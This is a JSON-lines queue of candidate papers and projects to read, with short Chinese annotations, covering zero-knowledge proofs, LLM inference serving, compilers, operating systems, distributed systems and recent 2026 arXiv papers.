-{"slug":"risc0-zkvm","area":"projects","topic":"cryptography-ZK","title":"RISC Zero zkVM","meta":{"col3":"2024","col4":"首个生产级 RISC-V zkVM;通用程序的 ZK 证明"},"url":"https://github.com/risc0/risc0","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"sp1-succinct","area":"projects","topic":"cryptography-ZK","title":"SP1","meta":{"col3":"2024","col4":"Succinct Labs;性能领先的 RISC-V zkVM,Rust 友好"},"url":"https://github.com/succinctlabs/sp1","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"circom-iden3","area":"projects","topic":"cryptography-ZK","title":"circom","meta":{"col3":"2024","col4":"iden3;最广用的电路 DSL,Web3 ZK 应用入门"},"url":"https://github.com/iden3/circom","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"noir-aztec","area":"projects","topic":"cryptography-ZK","title":"Noir","meta":{"col3":"2024","col4":"Aztec;Rust 风格 ZK 电路 DSL,比 circom 友好"},"url":"https://github.com/noir-lang/noir","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"arkworks-rs","area":"projects","topic":"cryptography-ZK","title":"arkworks-rs/algebra","meta":{"col3":"2024","col4":"Rust 椭圆曲线/有限域库;ZK 项目通用底座"},"url":"https://github.com/arkworks-rs/algebra","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"awesome-zk-proofs","area":"projects","topic":"cryptography-ZK","title":"awesome-zero-knowledge-proofs","meta":{"col3":"2024","col4":"ZK 论文/工具/教程汇总,研究入口"},"url":"https://github.com/matter-labs/awesome-zero-knowledge-proofs","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"mindie-2024","area":"projects","topic":"ml-systems","title":"MindIE LLM Inference Engine (Ascend)","meta":{"col3":"","col4":"Huawei 昇腾 NPU 上的 LLM 推理引擎;vLLM 在国产硬件路线上的对标方案,理解 dynamic batching + INT8/INT4 量化在非 NVIDIA 栈上的工业实现"},"url":"https://www.hiascend.com/software/mindie","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"lmdeploy","area":"projects","topic":"ml-systems","title":"LMDeploy: InternLM team inference toolkit","meta":{"col3":"","col4":"上海 AI Lab;TurboMind backend + INT4 KV cache 独家;理解 vLLM 之外的国产 LLM serving 方案"},"url":"https://github.com/InternLM/lmdeploy","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"flexgen-2023","area":"papers","topic":"ml-systems","title":"FlexGen: High-throughput Generative Inference of LLMs with a Single GPU","meta":{"col3":"","col4":"Stanford ICML'23;CPU/disk KV offload 的奠基论文,dossier 中作为离线场景候选"},"url":"https://arxiv.org/abs/2303.06865","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"kserve","area":"projects","topic":"ml-systems","title":"KServe: Kubernetes-native model serving","meta":{"col3":"","col4":"K8s 上的标准化模型服务接口;vLLM 工业部署 dossier 提到的 K8s 选项,对标 Ray Serve"},"url":"https://github.com/kserve/kserve","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"ray-serve","area":"projects","topic":"ml-systems","title":"Ray Serve: scalable model serving","meta":{"col3":"","col4":"Anyscale;分布式 actor 模型支撑的 LLM serving 框架,vLLM 集成路径之一"},"url":"https://docs.ray.io/en/latest/serve/index.html","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"deepspeed-inference-2022","area":"papers","topic":"ml-systems","title":"DeepSpeed-Inference: Enabling Efficient Inference of Transformer Models at Unprecedented Scale","meta":{"col3":"","col4":"微软;ZeRO-Inference + Tensor Parallel 的工业实现,vLLM/TGI 之前的主流选择"},"url":"https://arxiv.org/abs/2207.00032","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"machete-kernel-vllm","area":"projects","topic":"ml-systems","title":"vLLM Machete W4A16 kernel","meta":{"col3":"","col4":"vLLM 团队为 Hopper 优化的 W4A16 kernel,比 Marlin 快;阅读源码理解 mma instruction layout"},"url":"https://github.com/vllm-project/vllm/blob/main/csrc/quantization/machete/README.md","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"marlin-w4a16-kernel","area":"papers","topic":"ml-systems","title":"Marlin: a fast 4-bit GPTQ-style kernel","meta":{"col3":"","col4":"ISTA/DASLab;A100/H100 W4A16 kernel 加速 GPTQ/AWQ 推理 4 倍;vLLM 默认 quant kernel 之一"},"url":"https://github.com/IST-DASLab/marlin","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"lookahead-decoding-2024","area":"papers","topic":"ml-systems","title":"Break the Sequential Dependency: Lookahead Decoding (Jacobi)","meta":{"col3":"","col4":"LMSYS;无需 draft model 的并行解码,把 Jacobi 迭代搬到 LLM 推理;与 EAGLE/Medusa 同位竞争"},"url":"https://arxiv.org/abs/2402.02057","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"attention-sinks-2024","area":"papers","topic":"ml-systems","title":"Efficient Streaming Language Models with Attention Sinks (StreamingLLM)","meta":{"col3":"","col4":"MIT/Meta;通过保留前几个 token 作 sink 实现无限 streaming;长上下文推理标配"},"url":"https://arxiv.org/abs/2309.17453","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"yarn-rope-2023","area":"papers","topic":"ml-systems","title":"YaRN: Efficient Context Window Extension of Large Language Models","meta":{"col3":"","col4":"Nous Research;NTK-aware RoPE scaling 把 4k 模型扩到 128k;Llama-3 长上下文路线"},"url":"https://arxiv.org/abs/2309.00071","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"h2o-token-eviction-2023","area":"papers","topic":"ml-systems","title":"H2O: Heavy-Hitter Oracle for Efficient Generative Inference of LLMs","meta":{"col3":"","col4":"UT Austin NeurIPS'23;KV cache 重要性评分驱逐策略;长上下文 OOM 场景的工业方案"},"url":"https://arxiv.org/abs/2306.14048","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"scissorhands-2023","area":"papers","topic":"ml-systems","title":"Scissorhands: Exploiting the Persistence of Importance Hypothesis for LLM KV Cache Compression","meta":{"col3":"","col4":"Rice University NeurIPS'23;与 H2O 同期的 KV 驱逐方案,重要性假设的另一条路线"},"url":"https://arxiv.org/abs/2305.17118","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"compressed-tensors-vllm","area":"projects","topic":"ml-systems","title":"compressed-tensors: vLLM 量化模型格式","meta":{"col3":"","col4":"Neural Magic;vLLM 官方量化权重格式(FP8/INT8/W4A16),HF 上 RedHatAI 仓库主要载体"},"url":"https://github.com/neuralmagic/compressed-tensors","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"specbench-2024","area":"papers","topic":"ml-systems","title":"Spec-Bench: Comprehensive Benchmark for Speculative Decoding","meta":{"col3":"","col4":"PKU;EAGLE/Medusa/Lookahead/SpecInfer 横向对比的标准 benchmark;阅读后能快速选 spec 方案"},"url":"https://arxiv.org/abs/2401.07851","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} -{"slug":"cohere-embed-v3-2023","area":"projects","topic":"info-retrieval","title":"Cohere Embed v3 (multilingual + compressed embedding)","meta":{"col3":"","col4":"Cohere 商业 embedding;int8/binary embedding 工业代表;与 OpenAI text-embedding-3 同位选项"},"url":"https://cohere.com/blog/introducing-embed-v3","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"data"} -{"slug":"astro-starlight","area":"projects","topic":"frontend","title":"Astro Starlight (docs starter)","meta":{"col3":"","col4":"Astro 官方文档站模板;代替 Docusaurus 的轻量替代,dossier devtool 里的标准选项"},"url":"https://starlight.astro.build/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"devtool"} -{"slug":"drizzle-orm","area":"projects","topic":"backend","title":"Drizzle ORM (TypeScript SQL builder)","meta":{"col3":"","col4":"TypeScript-first ORM;与 Prisma 同位竞争,类型推导更轻量;dossier 推荐选项"},"url":"https://orm.drizzle.team/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"devtool"} -{"slug":"rustbelt-2018","area":"papers","topic":"compilers-pl","title":"RustBelt: Securing the Foundations of the Rust Programming Language","meta":{"col3":"","col4":"Jung-Jourdan-Krebbers-Dreyer POPL'18;用 Iris 在 Coq 里证明 Rust 类型系统 + unsafe 模式安全性;理解 Rust 内存安全证明的奠基"},"url":"https://research.ralfj.de/thesis_phd/thesis-screen.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"rust"} -{"slug":"stacked-borrows-2019","area":"papers","topic":"compilers-pl","title":"Stacked Borrows: An Aliasing Model for Rust","meta":{"col3":"","col4":"Jung-Dang-Kang-Hur-Dreyer POPL'19;Rust 编译器 Miri 用的 alias 模型,理解 unsafe Rust 的 UB 边界"},"url":"https://plv.mpi-sws.org/rustbelt/stacked-borrows/paper.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"rust"} -{"slug":"racket-2018-tour","area":"papers","topic":"compilers-pl","title":"The Racket Manifesto","meta":{"col3":"","col4":"Felleisen-Findler-Flatt-Krishnamurthi-Barzilay-McCarthy-Tobin-Hochstadt SNAPL'15;Racket 设计哲学:programmable programming language;Lisp 系语言演化代表"},"url":"https://www.cs.utah.edu/plt/publications/snapl15-fffkbmt.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"lisp"} -{"slug":"george-appel-1996","area":"papers","topic":"compilers-pl","title":"Iterated Register Coalescing","meta":{"col3":"","col4":"George-Appel TOPLAS'96;把 register allocation 的 coalescing 与 simplify 交替到不动点,工业编译器的标准 RA 算法"},"url":"https://www.cs.princeton.edu/~appel/papers/coalesce.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"compilers"} -{"slug":"wilson-1992-gc-survey","area":"papers","topic":"compilers-pl","title":"Uniprocessor Garbage Collection Techniques","meta":{"col3":"","col4":"Wilson IWMM'92;GC 综述教科书级,串起 mark-sweep / copying / generational / incremental;理解 JVM/Go/V8 GC 设计图谱"},"url":"https://www.cs.cmu.edu/~fp/courses/15411-f09/misc/wilson92survey.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"compilers"} -{"slug":"self-1991-chambers","area":"papers","topic":"compilers-pl","title":"Customization: Optimizing Compiler Technology for SELF","meta":{"col3":"","col4":"Chambers-Ungar-Lee PLDI'91;SELF 动态语言 inline cache + type feedback;现代 V8/SpiderMonkey JIT 的源头"},"url":"https://www.cs.ucsb.edu/~ckrintz/racelab/gc/papers/chambers-pldi91.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"jit"} -{"slug":"dynamo-2000","area":"papers","topic":"compilers-pl","title":"Dynamo: A Transparent Dynamic Optimization System","meta":{"col3":"","col4":"Bala-Duesterwald-Banerjia PLDI'00;HP 的二进制级 JIT,trace-based optimization 思想源头,影响 PyPy/Java HotSpot"},"url":"https://dl.acm.org/doi/10.1145/349299.349303","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"jit"} -{"slug":"graal-truffle-2017","area":"papers","topic":"compilers-pl","title":"Practical Partial Evaluation for High-Performance Dynamic Language Runtimes","meta":{"col3":"","col4":"Würthinger-Wimmer-Stadler-Duboscq-Humer-Hofer-Mössenböck PLDI'17;Truffle/Graal 把 partial evaluation 工业化;GraalVM 的核心论文"},"url":"https://chrisseaton.com/truffleruby/pldi17-truffle/pldi17-truffle.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"jit"} -{"slug":"lattner-llvm-2004","area":"papers","topic":"compilers-pl","title":"LLVM: A Compilation Framework for Lifelong Program Analysis & Transformation","meta":{"col3":"","col4":"Lattner-Adve CGO'04;LLVM IR 设计奠基论文;理解所有现代编译器中段优化的统一框架"},"url":"https://www.aaronbradley.org/cs6235/llvm-cgo04.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"compilers"} -{"slug":"racket-macros-flatt-2016","area":"papers","topic":"compilers-pl","title":"Binding as Sets of Scopes","meta":{"col3":"","col4":"Flatt POPL'16;Racket 的 hygienic macro 算法重写;DSL/Lisp 元编程理论核心"},"url":"https://www.cs.utah.edu/plt/scope-sets/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"metaprogramming"} -{"slug":"metaocaml-2003","area":"papers","topic":"compilers-pl","title":"MetaOCaml: A Compiled, Type-Safe, Multi-Stage Programming Language","meta":{"col3":"","col4":"Calcagno-Taha-Huang-Leroy;OCaml 上的多 stage 元编程;DSL 编译时生成代码的工业方案"},"url":"https://okmij.org/ftp/ML/MetaOCaml.html","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"metaprogramming"} -{"slug":"unlocking-the-working-memory-of-large-language-models-for-latent-reasoning-arxiv","area":"papers","topic":"ml-systems","title":"Unlocking the Working Memory of Large Language Models for Latent Reasoning","meta":{"col3":"2026","col4":"Aichberger-Hochreiter 2026 用 memory blocks 替代 autoregressive reasoning 单次 forward 完成 latent reasoning"},"url":"https://arxiv.org/abs/2605.30343","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"demystifying-data-organization-for-enhanced-llm-training-arxiv-2605-30334","area":"papers","topic":"machine-learning","title":"Demystifying Data Organization for Enhanced LLM Training","meta":{"col3":"2026","col4":"Microsoft 2026 STR/SAW 数据排序方法 + Boundary Sharpening/Cyclic Scheduling 等 4 准则"},"url":"https://arxiv.org/abs/2605.30334","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"soundnessbench-arxiv-2605-30329","area":"papers","topic":"machine-learning","title":"SoundnessBench: Can Your AI Scientist Really Tell Good Research Ideas from Bad Ones?","meta":{"col3":"2026","col4":"Furong Huang 2026 1099 ICLR 提案的 soundness 基准 frontier LLM 普遍 optimism bias"},"url":"https://arxiv.org/abs/2605.30329","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"how-lora-remembers-a-parametric-memory-law-for-llm-finetuning-arxiv-2605-30260","area":"papers","topic":"ml-systems","title":"How LoRA Remembers? A Parametric Memory Law for LLM Finetuning","meta":{"col3":"2026","col4":"ZJU 2026 LoRA 容量与序列长度的 power law MemFT 阈值优化策略"},"url":"https://arxiv.org/abs/2605.30260","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"same-evidence-different-answers-canonical-context-on-policy-distillation-arxiv-2","area":"papers","topic":"machine-learning","title":"Same Evidence Different Answers Canonical-Context On-Policy Distillation","meta":{"col3":"2026","col4":"CCOPD 2026 多轮对话中 self-anchored drift 现象 + canonical-context distillation 解法"},"url":"https://arxiv.org/abs/2605.30251","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"llmsurgeon-diagnosing-data-mixture-of-large-language-models-arxiv-2605-30348","area":"papers","topic":"machine-learning","title":"LLMSurgeon Diagnosing Data Mixture of Large Language Models","meta":{"col3":"2026","col4":"Zhiqiang Shen 2026 逆问题反推 LLM 预训练混合比例 Data Mixture Surgery"},"url":"https://arxiv.org/abs/2605.30348","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"loong-long-document-translation-agent-with-observe-and-act-arxiv-2605-30274","area":"papers","topic":"machine-learning","title":"Loong Long Document Translation Agent with Observe-and-Act","meta":{"col3":"2026","col4":"2026 3E 内存 Essence-Exemplar-Entity + RL 自我观察的长文档翻译 agent"},"url":"https://arxiv.org/abs/2605.30274","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"in-context-reward-adaptation-for-robust-preference-modeling-arxiv-2605-30323","area":"papers","topic":"ml-systems","title":"In-Context Reward Adaptation for Robust Preference Modeling","meta":{"col3":"2026","col4":"2026 transformer in-context 学习未见偏好域 human response time 作为辅助信号"},"url":"https://arxiv.org/abs/2605.30323","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"passnet-scaling-large-language-models-for-graph-compiler-pass-generation-arxiv-2","area":"papers","topic":"compilers-pl","title":"PassNet Scaling Large Language Models for Graph Compiler Pass Generation","meta":{"col3":"2026","col4":"2026 18K 图 + 200 任务的 LLM 编译器 pass 生成 benchmark TorchInductor 长尾 43% 慢 case"},"url":"https://arxiv.org/abs/2605.29357","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"e-path-equality-saturation-for-control-flow-graphs-arxiv-2605-28694","area":"papers","topic":"compilers-pl","title":"E-Path Equality Saturation for Control-Flow Graphs","meta":{"col3":"2026","col4":"2026 E-Path 数据结构把 equality saturation 扩展到 CFG 规避 phase-ordering 问题"},"url":"https://arxiv.org/abs/2605.28694","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"lacuna-safe-agents-as-recursive-program-holes-arxiv-2605-28617","area":"papers","topic":"compilers-pl","title":"LACUNA Safe Agents as Recursive Program Holes","meta":{"col3":"2026","col4":"Odersky 2026 agent 动作作为 typed program holes 编译时类型检查阻挡 prompt injection"},"url":"https://arxiv.org/abs/2605.28617","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"pacing-types-for-asynchronous-stream-equations-arxiv-2605-26635","area":"papers","topic":"compilers-pl","title":"Pacing Types for Asynchronous Stream Equations","meta":{"col3":"2026","col4":"RTLola 2026 运行时验证的 pacing 类型系统 Rocq 形式化证明 soundness"},"url":"https://arxiv.org/abs/2605.26635","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"a-formal-semantics-of-c-with-openmp-parallelism-arxiv-2605-26527","area":"papers","topic":"compilers-pl","title":"A Formal Semantics of C with OpenMP Parallelism","meta":{"col3":"2026","col4":"CompCert 2026 OpenMP C 形式语义 任何成功执行保证无 data race"},"url":"https://arxiv.org/abs/2605.26527","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"datesat-a-framework-for-solving-date-and-period-constraints-arxiv-2605-25180","area":"papers","topic":"compilers-pl","title":"DateSAT A Framework for Solving Date and Period Constraints","meta":{"col3":"2026","col4":"CMU 2026 首个支持日期/时间段约束的 SMT 框架 450 case 数据集 + Z3 后端"},"url":"https://arxiv.org/abs/2605.25180","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"agentic-proving-for-program-verification-arxiv-2605-23772","area":"papers","topic":"compilers-pl","title":"Agentic Proving for Program Verification","meta":{"col3":"2026","col4":"Bas Spitters 2026 Claude Code 在 CLEVER Lean 4 benchmark 上端到端 98.1 percent 成功"},"url":"https://arxiv.org/abs/2605.23772","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"milestone-multi-objective-compiler-phase-ordering-arxiv-2605-23435","area":"papers","topic":"compilers-pl","title":"MileStone Multi-Objective Compiler Phase Ordering","meta":{"col3":"2026","col4":"2026 GNN 预测 + RL 探索的 phase ordering 同能耗下执行时间降低 45 percent"},"url":"https://arxiv.org/abs/2605.23435","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"rtp-llm-high-performance-alibaba-llm-inference-engine-arxiv-2605-29639","area":"papers","topic":"ml-systems","title":"RTP-LLM High-Performance Alibaba LLM Inference Engine","meta":{"col3":"2026","col4":"Alibaba 2026 P-D Disaggregation + 分级 KV cache vs vLLM/SGLang 显著加速 + 1 亿用户验证"},"url":"https://arxiv.org/abs/2605.29639","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"iorm-hierarchical-i-o-governance-for-thousands-of-consolidated-databases-arxiv-2","area":"papers","topic":"operating-systems","title":"IORM Hierarchical I/O Governance for Thousands of Consolidated Databases","meta":{"col3":"2026","col4":"Oracle Exadata 2026 I/O Tagging + 分层 Resource Profile 多租户 IOPS QoS 工业实践"},"url":"https://arxiv.org/abs/2605.29006","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"bounded-priority-aware-locking-for-real-time-kernels-arxiv-2605-27620","area":"papers","topic":"operating-systems","title":"Bounded Priority-Aware Locking for Real-Time Kernels","meta":{"col3":"2026","col4":"BU 2026 Batched Priority Lock FIFO worst-case + 优先级 average wait 折中"},"url":"https://arxiv.org/abs/2605.27620","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"sandlock-confining-ai-agent-code-with-unprivileged-linux-primitives-arxiv-2605-2","area":"papers","topic":"security-privacy","title":"Sandlock Confining AI Agent Code with Unprivileged Linux Primitives","meta":{"col3":"2026","col4":"2026 非 root 进程沙箱 静态 policy 入 kernel + 监督进程兜底 专为 AI agent 不可信代码设计"},"url":"https://arxiv.org/abs/2605.26298","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"learnedcache-ebpf-integrated-perceptron-based-eviction-policy-arxiv-2605-26168","area":"papers","topic":"operating-systems","title":"LearnedCache eBPF-Integrated Perceptron-Based Eviction Policy","meta":{"col3":"2026","col4":"2026 Linux page cache 学习型驱逐策略 perceptron + eBPF + 实测 +10 percent insertion rate"},"url":"https://arxiv.org/abs/2605.26168","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"paracell-paravirtualized-secure-containers-arxiv-2605-20906","area":"papers","topic":"operating-systems","title":"ParaCell Paravirtualized Secure Containers","meta":{"col3":"2026","col4":"SJTU 2026 MPK XGate intra-container 隔离 + Pager 内存管理 vs RunV agent 工作负载 -88 percent 延迟"},"url":"https://arxiv.org/abs/2605.20906","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"clove-object-level-cxl-memory-management-in-managed-runtimes-arxiv-2605-20370","area":"papers","topic":"operating-systems","title":"Clove Object-Level CXL Memory Management in Managed Runtimes","meta":{"col3":"2026","col4":"Berkeley 2026 JVM 上的对象级 CXL 分层内存 profile-guided 热度跟踪 + 对象重定位"},"url":"https://arxiv.org/abs/2605.20370","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"sematune-semantic-aware-online-os-tuning-with-llms-arxiv-2605-15026","area":"papers","topic":"operating-systems","title":"SemaTune Semantic-Aware Online OS Tuning with LLMs","meta":{"col3":"2026","col4":"2026 LLM 语义引导的内核参数在线调优 41 参数 13 工作负载 +72.5 percent steady-state"},"url":"https://arxiv.org/abs/2605.15026","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"amp-arc-multi-proposer-protocol-with-bounded-inclusion-arxiv-2605-23677","area":"papers","topic":"distributed-systems","title":"AMP Arc Multi-Proposer Protocol with Bounded Inclusion","meta":{"col3":"2026","col4":"Tendermint 2026 多 proposer 区块链协议 解耦 dissemination 和 agreement bounded inclusion guarantee"},"url":"https://arxiv.org/abs/2605.23677","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"herring-parallel-batch-order-fairness-on-dag-based-blockchain-consensus-arxiv-26","area":"papers","topic":"distributed-systems","title":"Herring Parallel Batch-Order-Fairness on DAG-based Blockchain Consensus","meta":{"col3":"2026","col4":"2026 Narwhal/Tusk 上的并行 batch-OF vs FairDAG-RL +90 percent throughput MEV 防御"},"url":"https://arxiv.org/abs/2605.23648","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"multi-round-visibility-post-consensus-ordering-layer-for-dag-bft-arxiv-2605-2343","area":"papers","topic":"distributed-systems","title":"Multi-Round Visibility Post-Consensus Ordering Layer for DAG-BFT","meta":{"col3":"2026","col4":"2026 DAG BFT 的 post-consensus 结构化排序 committed DAG 作为证据基底"},"url":"https://arxiv.org/abs/2605.23432","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"inductive-deductive-synthesis-verified-distributed-systems-arxiv-2605-23109","area":"papers","topic":"distributed-systems","title":"Inductive Deductive Synthesis Verified Distributed Systems","meta":{"col3":"2026","col4":"Stoica/Lesani 2026 agent 协同合成实现+证明 分布式 KV store 7/7 vs SOTA agent 2/7"},"url":"https://arxiv.org/abs/2605.23109","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"monotone-erasure-codes-arxiv-2605-22426","area":"papers","topic":"distributed-systems","title":"Monotone Erasure Codes","meta":{"col3":"2026","col4":"2026 任意 monotone Boolean 公式上的 erasure code blockchain 通用化失效假设下的 AVID"},"url":"https://arxiv.org/abs/2605.22426","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} 